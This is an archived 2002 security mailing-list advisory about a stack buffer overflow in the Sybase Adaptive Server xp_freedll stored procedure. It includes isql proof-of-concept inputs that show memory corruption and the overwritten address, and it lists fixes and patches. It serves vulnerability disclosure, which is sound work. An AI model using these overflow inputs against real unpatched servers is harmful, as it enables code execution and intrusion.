[NT] Sybase xp_freedll Buffer Overflow

From: support@securiteam.com
Date: 11/28/02

Next message: support@securiteam.com: "[NT] Sybase DBCC CHECKVERIFY Buffer Overflow"

Previous message: support@securiteam.com: "[NT] Sybase DROP DATABASE Buffer Overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: support@securiteam.com
To: list@securiteam.com
Date: 28 Nov 2002 15:54:11 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -

Sybase xp_freedll Buffer Overflow
------------------------------------------------------------------------

SUMMARY

The extended stored procedure xp_freedll contains a buffer overflow that
may allow an attacker to overwrite the stack and execute arbitrary code
under the security context of the server. Execute permissions are granted
to public in the sybsystemprocs database on this extended stored
procedure.

DETAILS

Vulnerable systems:
* Sybase Adaptive Server 12.0 and 12.5

Sybase Adaptive Server provides an extended stored procedure (ESP) called
xp_freedll in the database sybsystemprocs. This ESP is used to release a
DLL that has been loaded by another extended stored procedure.

Xp_free accepts a single parameter that is the name of the DLL to free.
Xp_free does not validate the length of the string passed into the first
parameter. It then attempts to copy an overly long string into a small
memory buffer. This memory copy results in the stack and the stack pointer
being overwritten with the buffer. Once the stack pointer is overwritten,
execution can be redirected to an arbitrary location in memory and opcodes
injected into the long string passed to the ESP can be executed. This
allows the attacker to run arbitrary code under the security context of
the extended stored procedure server.

Below is an example of overflowing the buffer using the SQL tool isql.exe.

Memory corruption first occurs with a buffer of length 45.
1> xp_freedll 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.dll'
2> GO
Msg 11496, Level 16, State 7:
Procedure 'xp_freedll', Line 2:
Cannot read from site 'MRFREEZE_XP'. Please check the XP Server error log
file for detailed error description. (return status = -6)

--------------------------------------------------------------------------------

With a buffer of 53 bytes in length, an exception is thrown.
1> xp_freedll 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.dll'
2> GO
Encountered an exception(0) in ESP xp_freedll in DLL sybsyesp. If this is
an user DLL check the code else contact Sybase Technical Support. (return
status = 1)
The following entries are recorded into the event logs.

11403: Encountered an exception(0) in ESP xp_freedll in DLL sybsyesp. If
this is an user DLL check the code else contact Sybase Technical Support.

11403: Encountered an exception(193) in ESP xp_freedll in DLL sybsyesp. If
this is an user DLL check the code else contact Sybase Technical Support.

11403: Encountered an exception(997) in ESP xp_freedll in DLL sybsyesp. If
this is an user DLL check the code else contact Sybase Technical Support.

--------------------------------------------------------------------------------

At 54 bytes in length, the follow memory locations appear in the event
logs:
11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process address
0x696c6c not in pool in 'srv_senddone()' .

11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process address
0x696c6c not in pool in 'srv_sendinfo()' .

11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process address
0x696c6c not in pool in 'srv_sendstatus' .

--------------------------------------------------------------------------------

At 55 bytes in length, the follow memory locations appear in the event
logs:
11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process address
0x642e5858 not in pool in 'srv_senddone()' .

Notice that the memory location has been modified to include 5858 which is
the X we used in the buffer overflow.

--------------------------------------------------------------------------------

As we continue to increase the buffer size, we see that the address is
completely overwritten by the buffer.

11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process address
0x58585858 not in pool in 'srv_sendstatus' .

--------------------------------------------------------------------------------

Fix:
Execute permissions on the extended stored procedure xp_freedll in the
sybsystemprocs database should be revoked from public. You should also
apply the following patches:
* 12.5.0.2 - 11/14/2002
* 12.0.0.6 ESD#1 - 11/5/2002

These patches can be downloaded from
<http://downloads.sybase.com/swd/swx> http://downloads.sybase.com/swd/swx

ADDITIONAL INFORMATION

The original advisory is available at:
<http://www.appsecinc.com/resources/alerts/sybase/02-0003.html>
http://www.appsecinc.com/resources/alerts/sybase/02-0003.html

The information has been provided by <mailto:anewman@appsecinc.com> Aaron
C. Newman (Application Security, Inc.).

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next message: support@securiteam.com: "[NT] Sybase DBCC CHECKVERIFY Buffer Overflow"
Previous message: support@securiteam.com: "[NT] Sybase DROP DATABASE Buffer Overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Re: My dll problem
... caller has to provide the memory a function in a DLL is supposed to ...
function in the last parameter that you passed in a buffer of 180 byte. ... then wire the
output to a Byte Array To String ... (comp.lang.labview)
pass char* over dll-boundaries
... I've got a DLL in which I have a method GetBuffer (this one is extern, ...
puttiing it simple in here I assume memory is already allocated and buffer ... (comp.lang.cpp)
Re: C++ to Delphi conversion
... The DLL and the calling code don't use the same memory manager, so no,
it ... it is never very wise to return a newly created buffer ... (borland.public.delphi.language.objectpascal)
Re: [Lit.] Buffer overruns
... right amount of memory for the line. ... a 60-byte line being stored in a 4096-byte
buffer; dynamic allocation is ... not security issues. ... (sci.crypt)
Re: [Lit.] Buffer overruns
... right amount of memory for the line. ... a 60-byte line being stored in a 4096-byte
buffer; dynamic allocation is ... not security issues. ... (comp.security.unix)